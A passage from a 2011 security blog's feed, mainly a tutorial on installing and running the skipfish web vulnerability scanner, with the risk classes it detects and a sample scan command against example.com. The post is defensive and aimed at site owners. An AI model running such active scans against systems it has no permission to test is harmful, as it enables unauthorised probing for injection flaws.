Here are some screenshots of the tool in action:

 

 

Useful links:

 

 

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/04/10/dril-domain-reverse-ip-lookup-tool/feed/ 1
skipfish: Web Security Reconnaissance Tool http://bechtsoudis.com/2011/04/05/skipfish-web-security-reconnaissance-tool/#utm_source=rss&utm_medium=rss&utm_campaign=skipfish-web-security-reconnaissance-tool http://bechtsoudis.com/2011/04/05/skipfish-web-security-reconnaissance-tool/#comments Tue, 05 Apr 2011 01:05:13 +0000 http://bechtsoudis.com/?p=217 Skipfish is a fully automated, active web application security reconnaissance tool released by Michal Zalewski (lcamtuf) . Web developers and security professionals can use skipfish to run  a series of tests to websites that are under their responsibility. Skipfish support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments (i have made my tests under Debian distribution). The tool has been released to the public by Google, in order to offer an easy to use and high speed solution for making websites safer.

Skipfish classifies the discovered risks as high, medium and low. Some of the higher risk ones include:

  • Server-side SQL injection (including blind vectors, numerical parameters).
  • Explicit SQL-like syntax in GET or POST parameters.
  • Server-side shell command injection (including blind vectors).
  • Server-side XML / XPath injection (including blind vectors).
  • Format string vulnerabilities.
  • Integer overflow vulnerabilities.

Skipfish isn’t the only available solution. There exist many free and commercial web scanner vulnerabilities tools (like Nikto2 and Nessus), which sometime have better analysis results. In any case, it’s about time people started taking security seriously, and using a tool like this is a good initial step in the right direction.

Let’s proceed to the installation steps:

  1. Download skipfish from the official site.
  2. Check downloaded sha1sum with the one from the official site.
    $sha1sum skipfish-1.x.tgz
  3. Ensure that your system meet the requirements (if not install the require packages through your OS package manager):
    • libidn11
    • libidn11-dev
    • libssl-dev
    • zlib1g-dev
    • gcc
    • make
    • libc6
    • libc6-dev
  4. Extract files.
  5. run make to compile the sources. In case of problem read known issues wiki.

After compile has finished, you are strongly advised to read the README-FIRST file, in order to choose the appropriate type of dictionary. As a start if your website application is small, you can use the complete.wl dictionary.

 

Let’s proceed to the running part.

  1. In the skipfish main directory make a copy of the complete dictionary
  2. $cp dictionaries/complete.wl skipfish.wl
  3. Create a directory for the output reports.
  4. Execute skipfish giving the website url.
  5. $./skipfish -o outputresults http://example.com
  6. Hit a key to start the scan.
  7. Wait the scan to finish. In case you terminate the scanning process you can see the so far reported risks.
  8. Open the index.html report with firefox.

You should then be able to interpret the results easily. Most of the scan results are pretty self-explanatory. It is recommended to pay attention first to high risk vulnerabilities detected by the scan. You can expand those results to read more details.

What to do next? Well you need to educate yourself at understanding and correcting these vulnerabilities, for example if Skipfish is reporting some MySQL injection vulnerabilities in your website you might need to read and learn more about  SQL injection. You can use Google to read more details about that vulnerability.

 

Here are some screenshots from the tool:

 

Useful links:

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/04/05/skipfish-web-security-reconnaissance-tool/feed/ 1